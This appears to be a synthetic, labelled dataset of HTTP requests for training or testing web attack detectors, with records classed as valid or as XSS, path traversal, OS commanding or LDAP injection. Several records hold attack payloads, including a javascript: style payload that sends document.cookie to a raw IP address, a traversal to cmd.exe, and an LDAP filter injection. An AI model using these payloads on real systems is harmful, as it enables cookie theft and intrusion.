~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14619
Start - Id: 46768
class: XSS
POST /tCps/mm8Hbbsn5/dofiEniaiwyhiceS1eu/yEh5/Ywt/fpl./aH7X_/BDyYXgXVnvusr1/iusjOrpt/selectzorjiHJhttpsLpzN2/iZ36G82D.mspx? HTTP/1.0
Content-Length: 371
Content-Language: vlo
Content-Encoding: gzip
Content-Location: http://www.atnn0rp.de/v5hXa/sato0Nr/s6nvti.php4
Content-MD5: N2NwZThlZW54aWhzVHJpeA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 12 Dec 09 07:00:12 CET
Last-Modified: Sun, 03 May 09 22:25:28 CET
Host: www.smnu.uk
Connection: oSucN
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: identity, deflate, deflate
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 202.152.82.23
Cookie: ielSyYRCseeeal=ropt
Cookie2: $Version="4"
Date: Sun, 28 May 06 23:03:43 GMT
ETag: "uvWwqLBwApGZcIhP"
Expect: feazi6
From: dyenT@gpt6glsG.cz
If-Modified-Since: Thu, 22 May 08 06:18:58 UTC
If-Unmodified-Since: Mon, 03 May 10 03:41:21 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 20 Oct 09 09:58:38 GMT
Max-Forwards: 4
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: o1svi Elj40=bhoesO1
Authorization: 8eeq bSihE=Gspcil
Range: 462-
Referer: /swno/32x6r.html
TE: gzip,gzip;q=0.4
User-Agent: t8SVmbY http://www.paitsoie.org
UA-Color: color32
UA-Pixels: 1199x1516
Via: FTP/2.3 www.Edityfik.js, Ar9s/1.7 90.180.35.219, 7.8 www.a4Ieoorn.jpg
Transfer-Encoding: p9loe; tn6hn=xuRtltbn
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 183.74.153.68
X-Serial-Number: 105971197314660
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

a908boot.ini=etlVNBWlWS9&taaha3en0ty=aau=unsSlt&andyYc47I7=26176&MJWYQLmfUxxtermi=\3&ot=<div    style  ="  background-image:     url(javascript: [window.open('http://57.162.105.172/rori.php3'+document.cookie);]);   "   >&netHvsi=nOl&hetaut3exA5g=93448195&mool=0226&toMtaeswooqtmi=429906&1es=90441639&36Isrsfwtrsoa=ebetweene

End - Id: 46768
Start - Id: 45867
class: PathTransversal
GET /ll/sm6saetGvbTerv/Z-4/thsrLgnsp/vd7/DPlzi8ObEn-VoptCo.mdb?zreeehKeenoo=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Ftachri%2Flitr%2Fve%2Fitritrde.swf&dteteLlh=3806199712&hoa=twjmuwe+ HTTP/1.1
Host: 71.100.61.121
Connection: r33o
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: n-denaraii;q=0.2, ss-eD;q=0.3
Cache-Control: no-store
Client-ip: 201.51.1.17
Cookie: hy6eohSai=64010;un=970201;rhrlosQc4itbxo=lad9f\scriptaEapLiy;erfeneloihdgato=eet7d;enr5=lbs
Cookie2: $Version="9"
Date: Sat, 07 Apr 07 09:28:07 GMT
ETag: "NZR.pyFHpDj5.Hgrtt6w"
Expect: hor0
From: lnkmyen@hfeiUitnt.com
If-Modified-Since: Wed, 03 Nov 04 05:21:07 UTC
If-Unmodified-Since: Tue, 13 Jan 04 20:26:41 CET
If-Match: *
If-None-Match: "7pzulJtaiwjRa.ZuWwg"
If-Range: "5QXw0MQIv0tVC47.D.4n"
Max-Forwards: 279
MIME-Version: 5.3
Pragma: e='aRai'
Proxy-Authorization: ha2n eocndmf=oIeb
Authorization: NTLM bmNocXNpaGQ1aXRSN3JwaWxzNmJvZXJpaW9lbWVyYmVkb3Rhb2pvbWQ=
Range: 81947-,357703-
Referer: http://www.fsf1tir.de/sii2/wganva4/bimdOt/2oosLst/oaxwAnv.dll
TE: chunked,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.5 (compatible; Konqueror/9.9; SunOS sun4u; aei0looD; asayeo; kuiO3)
UA-CPU: Sparc
UA-Disp: 096,9977,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0549x672
Via: 5.8 236.95.231.96
Transfer-Encoding: gzip
Upgrade: impc/6.7
Warning: 645 115.27.59.90:9013 "qanewiWttmahnnlyit1n" "Thu, 03 Mar 05 21:14:02 GMT"
X-Forwarded-For: 159.83.172.168
X-Serial-Number: 61308570883843
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45867
Start - Id: 14184
class: Valid
GET /tJAmj_eRk1_/itrdoFou/oykooliEgoid5/lQ_0ljCT/er0edF/V32/nr/tZMEqTumXvTD7iBAi6_.cgi?9acgteom7E=l%3Dn&as=aNdr0W%40NWLU5&qg=0&adcpndytnlus=11&aelnhiEeC2ehayN=1sAqddfobjecthyy&Fr5cv=10883713&eai=opnEYUt8&ehfacrxce=njc5pe4me&n1toVtc=7iaaretss%5Cdy&VnullXOMAFPchild=2770&irlttBy4s=seicRztlRa&txkl6toUt84oz6=Rohd&acceptScWaEE=t1_R HTTP/1.0
Host: www.te7sabrom.de:7
Connection: keep-alive
Accept: text/*, text/*
Accept-Charset: iso-2022-kr;q=0.4, x-mac-arabic;q=0.5, iso-8859-9;q=0.3
Accept-Encoding: identity, compress;q=0.6, compress;q=0.5, deflate, identity;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 18.88.7.100
Cookie: ndilH=reIdfjlq-;P2nnfs3steEst=kyZYPsr;mflfO=hhs;raoh=31851025;er=60134294
Cookie2: $Version="4"
Date: Fri, 08 Dec 06 08:28:01 GMT
ETag: W/"fMj2vF-tM0p0R6MV"
Expect: 100-continue
From: wsyn@xHfoxPi.it
If-Modified-Since: Thu, 05 Apr 07 02:24:14 GMT
If-Unmodified-Since: Sun, 17 Oct 04 19:22:36 GMT
If-Match: "CHSBeVjC8RZzY0f@Av"
If-None-Match: *
If-Range: "hxpd-xPXq5lRYGe"
Max-Forwards: 94
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: meye5i cell=L8Du9oSg
Authorization: NTLM YzlhZXRFY2F6YWVudEVyMGVmZXRvRW9vcGMxZXRlN2htd3VuaHBvZWZhag==
Range: 3510-,64-0
Referer: /osTjvl/Gpax/eotaf9y.jpg
TE: chunked,deflate;q=0.1
Trailer: If-Modified-Since
User-Agent: Mozilla/1.4 (Machintosh; U; Mac OS X 5.3; su-Vt; rv:4.9.0) Gecko/03973398
UA-CPU: x86
UA-Disp: 9830,719,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 3581x504
Via: 2.9 224.189.50.46, HTTP/8.5 www.cr5f.gif, dCkt/8.1 www.heab.css
Transfer-Encoding: identity
Upgrade: lahia/9.9, khro/5.9, cn6rl/8.9, Leuecl/0.7
Warning: 607 145.140.108.102 "1uaqkehhratt5eDyite" 
X-Forwarded-For: 78.119.180.100
X-Serial-Number: 983815591636299863
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 14184
Start - Id: 26340
class: Valid
GET /rtiV/mq/eXKNV/hHyrtudcWqfbEha3t/sdlrxabasnnd4d.php3?3rmr=em6%5D+vO%40fp2kUwc8O&lie=nt+ HTTP/1.0
Host: www.psOluft.biz:0
Connection: tmtai70r
Accept: video/*, audio/*, image/gif
Accept-Charset: windows-1250, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: *
Cache-Control: oaa=shitm
Client-ip: 20.37.110.252
Cookie: l09e4hefb7=7302770;LdeK=blsrGR;Sodoidr=and;97BmochapLO@-T=hqe45rAxc/t
Cookie2: $Version="378"
Date: Tue, 31 Mar 09 16:41:25 CET
ETag: W/"B9apA69xetbtlxTa"
Expect: roudurt
From: eetns@gfcsenLkB.net
If-Modified-Since: Thu, 13 Jan 05 18:18:34 CET
If-Unmodified-Since: Tue, 05 Jun 07 14:39:20 UTC
If-Match: "o8B11kNtq3hgTFGDWK1o"
If-None-Match: *
If-Range: Wed, 28 Jun 06 03:01:03 CET
Max-Forwards: 272
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Basic bmVyM2J1cjppRWlI
Authorization: Basic M2pkSWwyYWU6a2JlaHNvbGg=
Range: 41-,127-,9-039
Referer: http://ltt3toNE.de/rCfn/Tasl/anumssas/bokhnms/rcIna.php3
TE: trailers,chunked
Trailer: Pragma
User-Agent: eLpI7Fit http://www.oTdua.cz
UA-CPU: StrongARM
UA-Disp: 417,8223,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 917x537
Via: 7.7 www.85dff0c.png:3, yesf/6.8 www.mguPucE.jpeg, 2.2 www.d1l2em.html
Transfer-Encoding: knera; i4tnI=dc9iopt
Upgrade: 9joysm/9.5, ucehec/7.9, nRtrye/6.5
Warning: 815 www.rbtyila5.css "ciOtmopyFf" "Tue, 22 Jan 08 03:00:01 CET"
X-Forwarded-For: 113.183.151.252
X-Serial-Number: 908761770500
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 26340
Start - Id: 6772
class: Valid
POST /f0/9pioeorb/iicecemut/9tIEE7EbNhyUz1/e6w/tAAWMTTFH9N/eha4eea/4D/E1object2h@/h4itnsntlweaxw9sr7tl/udxIsorzTeTermircm/q7e.nsf? HTTP/1.0
Content-Length: 317
Content-Language: ri
Content-Encoding: deflate
Content-Location: /Orea.pl
Content-MD5: YXNoc2VVaHRlY2V5b3R0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 05 Jan 09 07:20:09 CET
Last-Modified: Thu, 30 Nov 06 15:26:13 UTC
Host: www.92eftS.org
Connection: esTRl
Accept: application/x-tar;q=0.1, text/xml;q=0.6
Accept-Charset: iso-8859-1, x-mac-chinesesimp;q=0.1, ks_c_5601-1987;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 93.236.222.131
Cookie: @tmplT53aCT=637783813
Cookie2: $Version="75"
Date: Sun, 31 May 09 14:33:04 GMT
ETag: "qXmOYNfiyjf3O5R"
Expect: 100-continue
From: hgrgi@twaau.be
If-Modified-Since: Tue, 04 Mar 08 05:49:14 UTC
If-Unmodified-Since: Tue, 01 Jan 08 07:29:31 UTC
If-Match: "JbYga8vSI1hde98apWC"
If-None-Match: *
If-Range: Fri, 19 Aug 05 24:45:30 UTC
Max-Forwards: 2
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest username="dZssynoF"
Authorization: Basic ZG90Y2k6ZTJ0aA==
Range: -53,50110-4206
Referer: http://15box.ch/rmbrHl.mdb
TE: gzip;q=0.7,chunked;q=0.6,chunked;q=0.0
Trailer: Range
User-Agent: svCa.WN_ http://www.tt7ndu.ch
UA-CPU: StrongARM
UA-Disp: 610,0382,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3268x616
Via: 8.9 18.134.7.38:8
Transfer-Encoding: gzip
Upgrade: wetlti/0.9, ndo/4.0, Ralc/5.4, 4tt/7.6, ogib0/1.3
Warning: 686 27.211.29.45 "sijrpot" "Sat, 10 Jun 06 10:21:01 UTC"
X-Forwarded-For: 191.106.203.155
X-Serial-Number: 830725
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aiixTodpw2b=ssgagmos(6$andfolm8hi&ashiino=36997&nmGtsezrd6poe=eP5IHclQhB8&ii9a9qs=ore&t39tcnhg=execnLvregqdscript &H8BQTS9=itthecztSegwlrs&taqz=kS3uWDzj_Pc&utnoeeri2eep=ecpUa-ta&tsock_streamRB=32&BpositionWwp-dropALf=i1syiep+i'zTr'twindow.open)body3i&iaarshirucnr=3604683&ysihcttit5=l Iati1D(rmfehrcinma

End - Id: 6772
Start - Id: 43669
class: OsCommanding
GET ..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.wM5mkean.biz:792
Connection: sudrexr
Accept: application/*, audio/*
Accept-Charset: iso-8859-2, euc-tw, windows-1255;q=0.9, euc-jp;q=0.6
Accept-Encoding: *;q=0.3
Accept-Language: u-L, ist-iBnnsdyt, 3txmni-eu;q=0.2
Cache-Control: min-fresh=53
Client-ip: 158.250.190.86
Cookie: tSzf=tqbtelnetrmh-~symain
Date: Sat, 29 Nov 08 23:53:20 CET
ETag: "y-vPzRAwL-5olCNDYBs"
Expect: 100-continue
From: r63aj@miwmhwde.ch
If-Modified-Since: Tue, 06 Dec 05 09:36:51 UTC
If-Unmodified-Since: Mon, 14 May 07 06:24:17 GMT
If-Match: "4RwpNY5ja7vm3k-"
If-None-Match: *
If-Range: Sun, 31 Jul 05 13:20:23 GMT
Max-Forwards: 3194
MIME-Version: 2.2
Pragma: mot9d='etne8irh'
Authorization: Basic bWllc3I6aHVzNmVubzc=
Referer: /mPl6Tsrn/srnflXde/r0nTw/yie5t.sh
TE: chunked;q=0.2,deflate
User-Agent: o5rcXetanelerI
UA-CPU: Sparc
UA-Pixels: 697x5821
Via: 5.6 40.21.55.90:554
Transfer-Encoding: compress
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 309 41.169.220.190 "skootttttuEirTl" 
X-Forwarded-For: 129.156.147.149
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43669
Start - Id: 14831
class: Valid
GET /eosotarBtecna6rM6/aeXBZDR1BZUJw5.5V@K.aspx?6dataRt=fAo&cr7e=644&u06cp23o1oa1ori=0kattlwios&9iiefeowpkDn=sez&eHlld5i0b4o4=iAqc3ULy&e08tdAlee=eh.yWxj-Dr&te5=aerSwn&b0r8=uA7Qj&scgaHwgtmb9lim=k0r HTTP/1.0
Host: 177.124.88.45:85
Connection: aeaYn
Accept: text/*;q=0.5, image/*
Accept-Charset: *
Accept-Encoding: compress;q=0.7, identity
Accept-Language: mk-rhxao;q=0.5, MeIhnIio-cntri;q=0.1
Cache-Control: y9t='ra'
Client-ip: 35.5.220.119
Cookie: cth9r=neead9eRatg;qreee=811729837;ioutgftCttho=e7dc3?)eopt
Cookie2: $Version="33"
Date: Tue, 29 Jun 04 02:50:58 UTC
ETag: "cl9MF-53YBh2BP.F"
Expect: hedbro=is1En
From: 7dmt3haa@civb.net
If-Modified-Since: Tue, 13 Dec 05 17:49:05 UTC
If-Unmodified-Since: Mon, 19 Dec 05 24:25:41 CET
If-Match: *
If-None-Match: "HXeo@_kbdHeKDBugF"
If-Range: *
Max-Forwards: 8
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: niosi tjsll=y4sneodh
Authorization: NTLM M1RjaGRLZWl5ZXBSc0Rzb2lKdXRhZndzZWVlaWVlZGQ5dWJlZWxucThjb3Nobg==
Range: 77669-8794
Referer: http://eeueiyj.be/lAadk5.wav
TE: deflate,trailers
Trailer: Date
User-Agent: coUasoOUlnd
UA-CPU: 68000
UA-Disp: 1041,483,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 923x8805
Via: 5.9 115.145.195.126, 8.6 www.hnt3ob.tiff, FTP/5.6 226.218.134.243
Transfer-Encoding: deflate
Upgrade: altl/2.2
Warning: 396 135.99.201.170 "ensfieereprG" 
X-Forwarded-For: 220.203.31.112
X-Serial-Number: 89813
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14831
Start - Id: 37170
class: LdapInjection
GET /9h2z.aspx?ytye=alts&ebprs7sToioae4d=d-bIVO_i&tab0iOileo=ieeun%29%28%7C%28hmh%3D*%29&wsai8ddsinthnl=n0d&FjYBYdN=u&84gropT=RinR4weo%40t0sE-+Ec HTTP/1.0
Host: 229.245.131.8:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.3, iso-8859-8, x-mac-chinesesimp;q=0.0, iso-2022-jp
Accept-Encoding: *
Accept-Language: afdtiu-ht, tystcdn-itftIsr, mzetel-rot, etnsn-sn1;q=0.9
Cache-Control: no-cache
Client-ip: 188.238.110.194
Cookie: dNf5CwsamJr=49036;hm0r=d5wFf;_Ngzd04LtD=708727;aL6N=em?;aeReivf1iotdw9e=2245326;eiseaspvit=admin2o nu bmailtcr>ee-~rsg
Cookie2: $Version="45"
Date: Mon, 23 Aug 04 24:31:08 UTC
ETag: "cmhDI5J8iYPu8ZT-g7OW"
Expect: eGqmep=9at5aun;pdiah=wrena
From: aedk@htQLhAndaa.gov
If-Modified-Since: Fri, 24 Jul 09 22:57:41 GMT
If-Unmodified-Since: Wed, 21 Jan 04 11:26:42 UTC
If-Match: *
If-None-Match: "WQ_-1Hx2FOdPcyy03L"
If-Range: Sun, 07 May 06 17:45:03 UTC
Max-Forwards: 315
MIME-Version: 3.6
Pragma: sr='h'
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: Digest nonce
Range: 183458-,10781-99705
Referer: /saaeEe/3eTegt/Eaedce4C.jpg
TE: deflate,trailers
Trailer: Via
User-Agent: 7ipdoersEe (n0li@R)
UA-CPU: 68000
UA-Disp: 303,353,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5776x2501
Via: 5.1 www.ne2sm9oh.html, 6.5 www.ngxis.htm, YOsv/2.9 www.htHA.htm
Transfer-Encoding: compress
Upgrade: Tri/4.5
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 194.226.246.19
X-Serial-Number: 6743183535814854929
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37170
Start - Id: 33398
class: Valid
POST /lzPwVc.dqGI1yo8/4IEPNBI/yi21ENKm/adnNwjt6n4lf7HN7a.html? HTTP/1.0
Content-Length: 88
Content-Language: kcgnder1,o
Content-Encoding: compress
Content-Location: /4tOTzmp/aebd.avi
Content-MD5: ZW9pcmVuY2h0c3NsdWFwbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 07 May 05 13:13:52 CET
Last-Modified: Thu, 24 Feb 05 02:13:05 UTC
Host: 78.175.154.41
Connection: awt7
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: Ut2oao-gttSh, taetai-eelesnP, Rtcdbesl-it;q=0.5, Saeac6o-erlx, lhee-cgGo
Cache-Control: only-if-cached
Client-ip: 87.155.255.84
Cookie: Xwget0vk1bgsoundtmpqp-@=iall aeenjtalsdmj;erem3ht3xephf=57;5vhmcnlXetti=Tsw&8;pabE1twlt6eyg=HT
Cookie2: $Version="3"
Date: Fri, 22 Jun 07 06:45:53 GMT
ETag: "AmF0BoiNVYeVcln"
Expect: ea87te
From: ooydtlh@tuohEicue.de
If-Modified-Since: Fri, 26 Aug 05 24:15:15 CET
If-Unmodified-Since: Sat, 12 Apr 08 17:03:57 UTC
If-Match: *
If-None-Match: "mmZddek2TjF0ODAl-"
If-Range: Tue, 04 Mar 08 18:11:01 GMT
Max-Forwards: 7
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: B90s vs5s=tsrhw
Range: -45727
Referer: /lhghaE/pbA9/xyoo/nivSb/tifeng.sh
TE: trailers
Trailer: Range
User-Agent: Mozilla/8.1 (Machintosh; U; PPC Mac OS X 4.7; ol-Ko; rv:3.2.8) Gecko/67290883
UA-CPU: x86
UA-Disp: 326,087,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 811x2728
Via: 1.2 www.eiaTye.jpeg, ot2O/5.6 210.73.35.49
Transfer-Encoding: compress
Upgrade: wcd8/1.3, hwe/0.4, aash/9.8, EsA/2.8
Warning: 454 98.218.12.151:008 "6Oim04" "Sat, 06 Nov 04 21:21:33 UTC"
X-Forwarded-For: 229.236.129.140
X-Serial-Number: 538088947583493833
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.Cpsf=oxvwm5l0ndeobzseId&tietwxlateno=0294&ymtbhtaiuzSrtek=<rfnelcnf&eielmtyfee=620526

End - Id: 33398
Start - Id: 9428
class: Valid
GET /zXb4Gpzpservicesxk/emYUSV8.QYy5XzdKo/n5PBIBE8WQ2.asmx?DvugiZCELZ=116073474&aTvarnvQan=vAz9X&YVTP2yls2node=xcgonbrsiiem7ala&1kpr8cwvp=eLqK3_MjhC5&srsrglhvhh4a=wPije&EytgeeEyo=6 HTTP/1.0
Host: 191.51.62.85
Connection: 4has8l
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: mPn9ls-da, ttfDpdLs-thhhtaO6;q=0.9, usr6e-n5VcnzE, toxEeife-aelr
Cache-Control: no-transform
Client-ip: 229.63.55.25
Cookie: filaldahvd=otpabiim gn;wTTK=02376001
Cookie2: $Version="34"
Date: Sun, 23 Jan 05 24:15:51 UTC
ETag: "HbnizsGpZA7Hy1F_JSI"
Expect: Sy1e1tE
From: wibwt3iO@ihhho.be
If-Modified-Since: Wed, 30 Aug 06 21:54:58 UTC
If-Unmodified-Since: Sun, 12 Feb 06 24:20:38 GMT
If-Match: "MmbCea-YVWUwBXgJ"
If-None-Match: *
If-Range: Thu, 30 Dec 04 13:25:49 CET
Max-Forwards: 3984
MIME-Version: 4.1
Pragma: reiha='2ita'
Proxy-Authorization: NTLM aDRla2V1NHNzZ3RuZHJOb29QaGFlZ2ZpNFNhb0N0aGFyaGFPZWhsbnV3
Authorization: 3I0n ohotn9ht=usheg
Range: 13-1,-254711
Referer: /rsojc/oeats9mO/innn/uuroOvm.css
TE: deflate;q=0.5,trailers
Trailer: From
User-Agent: Mozilla/6.1 (compatible; Konqueror/5.8; SunOS sun4u; osPzsjy; ayySEc0yny; iepse)
UA-CPU: 68000
UA-Disp: 269,5048,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 413x817
Via: 7.5 www.dExci1EE.html, 4.1 122.63.126.82:940, 9.5 226.248.40.179
Transfer-Encoding: gzip
Upgrade: n1s/5.5, lmwiso/3.8, Tal9/6.5, E6Ia/4.3
Warning: 738 140.221.7.254 "oocsausmslte1sij8e" "Sun, 16 Nov 08 18:45:16 CET"
X-Forwarded-For: 24.185.22.139
X-Serial-Number: 637220700897
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9428
Start - Id: 24524
class: Valid
GET /hGpkxP.iZJI0o-LmuMZO/nuRtngcd8pe/oi/4sce/en/t@vv/ri/KQWL/nv1/rlRa1MwzjkiPThuMfnuH.tiff? HTTP/1.1
Host: www.q44rgeis4.de:66910
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.9
Cache-Control: min-fresh=4653
Client-ip: 106.138.49.194
Cookie: v0ecF7tyhaeaa=23;chnf=d:pr;fc=rLi2o4
Cookie2: $Version="199"
Date: Mon, 20 Mar 06 04:25:31 CET
ETag: W/"I6sJ9XSFVjVyl8@kdxf2"
Expect: 100-continue
From: pzwu7iEa@yhivtK.st
If-Modified-Since: Sat, 05 Jul 08 19:04:22 GMT
If-Unmodified-Since: Wed, 02 Dec 09 09:20:55 GMT
If-Match: *
If-None-Match: *
If-Range: "qtr-yURl_hTfIL7baM"
Max-Forwards: 04
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic ZXNTZmFhOmVvaWZkb3M=
Authorization: Basic YmNPaGdDajowYXNld3Q=
Range: -85539,4-,9083-
Referer: /eisa/heha0ipi/iNio.nsf
TE: trailers,chunked;q=0.2
Trailer: If-Modified-Since
User-Agent: oCaoCHc19k http://www.kltw.ch
UA-CPU: PowerPC
UA-Disp: 1408,616,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 303x667
Via: 1.6 www.a3FUx.png
Transfer-Encoding: gzip
Upgrade: 5hgvq/9.4, 91hai/8.8, sHfHh/0.9, aooIe/4.6
Warning: 566 www.Xphrezsp.htm "njtsn" "Sat, 25 Mar 06 03:51:16 UTC"
X-Forwarded-For: 150.103.175.246
X-Serial-Number: 185732331097779
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24524
Start - Id: 364
class: Valid
GET /i9BLUrbbrlrpqJq8/e-2KgFGx/r4iiaeaerasioe/fsnclneef1/d-_KbXy1qBP/Qv3KcE-5CJPVGG/emltTge7enH8s0bnasft/utqusUhiaoeae4.php3? HTTP/1.1
Host: 44.39.98.12
Connection: atj3eBst
Accept: */*;q=0.2
Accept-Charset: x-mac-turkish;q=0.9, utf-7
Accept-Encoding: deflate;q=0.8, gzip;q=0.4
Accept-Language: tj-o;q=0.2, qs-4aUd, siae-mtta;q=0.5, en14-g;q=0.0, soei1tl-zs;q=0.6
Cache-Control: no-store
Client-ip: 197.140.152.87
Cookie: egd=wnm57cneenotstde;rrznv=aWhhZjwEGEQ_
Cookie2: $Version="805"
Date: Fri, 15 Aug 08 23:43:28 CET
ETag: "lpXZBK9YVfrzWM7FW72"
Expect: 100-continue
From: reeaoce@64d8bre.ch
If-Modified-Since: Sun, 02 Mar 08 24:54:33 UTC
If-Unmodified-Since: Tue, 08 Apr 08 17:11:25 GMT
If-Match: "43-KMLn1XnYKJaiD5lp"
If-None-Match: "KjwAICp5A1Zi1iBBJT"
If-Range: Wed, 21 Jan 09 01:23:11 CET
Max-Forwards: 9
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Basic aDJ5bGE6Y2Rzb2M1emM=
Authorization: Basic ZTlvZWNwaXA6cmJibnlz
Range: 8710-01733,-01343,44-
Referer: /rqot/oeoisl.js
TE: trailers,gzip
Trailer: Connection
User-Agent: rxprLwhlew (e4YCMrn; a43@pJy0E; q9MwNP5n_; e725cL; dSBu2EQir5)
UA-CPU: StrongARM
UA-Disp: 6838,2277,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8450x4631
Via: 5.7 33.9.105.183
Transfer-Encoding: deflate
Upgrade: sc3s/5.1, dtoP7n/7.1, ndxl/8.8
Warning: 716 70.88.88.159:5 "a0fs3znethie" "Tue, 16 Oct 07 17:08:47 GMT"
X-Forwarded-For: 16.205.89.126
X-Serial-Number: 384250626
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 364
Start - Id: 18821
class: Valid
GET /tWHNMW1tyrXb/5-IaFCUz.cgi?kqsubin08=6499&ta2seThU=+&e1npotll2imYt=aaemfkrrr&xrN=gt++or4S%27eondivu7%3DLu&beeS=hTrzEX&Nai=hd&A-xXSwVxterm=omt8&wuZmeta77z=99088&ytrnmaefgnx=0x5u9EYD3Gg%40&ylpe.D=afet&0Dro7=bhengoNgai&ssshh=oryeiguEo8mnneg HTTP/1.0
Host: 207.98.181.72
Connection: pttifge
Accept: audio/*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: Rlia-0cmSioai;q=0.5, raeTa-hon
Cache-Control: ohtc=f
Client-ip: 172.80.63.92
Cookie: HTp5etortt=37;ohim=lch3it;mtSrXbAdeg=7cdroptc;@u2a=7iststdin27a'1 eetrr2
Cookie2: $Version="221"
Date: Sat, 05 Jun 04 12:19:57 GMT
ETag: "G1nWhG63FhyfhWpQ80"
Expect: 100-continue
From: ejhs@hewTyhroi.uk
If-Modified-Since: Mon, 12 Jan 09 09:50:39 CET
If-Unmodified-Since: Thu, 19 Jun 08 01:25:41 UTC
If-Match: "NUWFuGMtdVgUBDN1E"
If-None-Match: "12Y9.QlezE70-f6"
If-Range: Wed, 22 Oct 08 16:17:12 UTC
Max-Forwards: 9
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Basic T2FvaTpndXR0NA==
Authorization: Votbd tlnbs=eeoij
Range: -0457,62668-,60-4
Referer: /tapz3drp/ilqhnzv0/ngshae/dInen.php3
TE: trailers,deflate
Trailer: If-Range
User-Agent: Mozilla/9.6 (X11; U; Solaris 8.5; eh-t2; rv:0.8.9) Gecko/97289937
UA-CPU: x86
UA-Disp: 941,1451,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4147x8311
Via: HTTP/4.3 www.3ae2dy2.png, FTP/0.5 www.rrd7pr.css
Transfer-Encoding: iyma; teit=heooaa
Upgrade: 73i5no/4.3, Iqntnr/7.2
Warning: 587 60.189.174.160 "eapBalire2l" "Mon, 19 Apr 04 02:48:51 UTC"
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 0589105482767734530
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18821
Start - Id: 11720
class: Valid
GET /tA-V0ws-OR3RKKD/nmemetfohthaprw1.js? HTTP/1.1
Host: 88.109.192.64
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-9;q=0.9, windows-1250;q=0.6, x-mac-roman, big5
Accept-Encoding: *;q=0.9
Accept-Language: p-cF
Cache-Control: no-transform
Client-ip: 79.71.44.119
Cookie: 1lo8rihOsid=86086320;nne9vnnoiIoh=988;anyHhlaoevol=uti>;otked=76062;Cyokyoteine=nc<foasrtmpee
Cookie2: $Version="63"
Date: Fri, 18 Jun 04 08:33:40 GMT
ETag: W/"l_zW--IfNE6M3bDz"
Expect: lh9t=rqsddse
From: lAuala@v9ti4o.be
If-Modified-Since: Wed, 04 Aug 04 18:14:15 CET
If-Unmodified-Since: Wed, 07 Nov 07 03:32:09 CET
If-Match: "YEWtmq8d_GwY-ZQ"
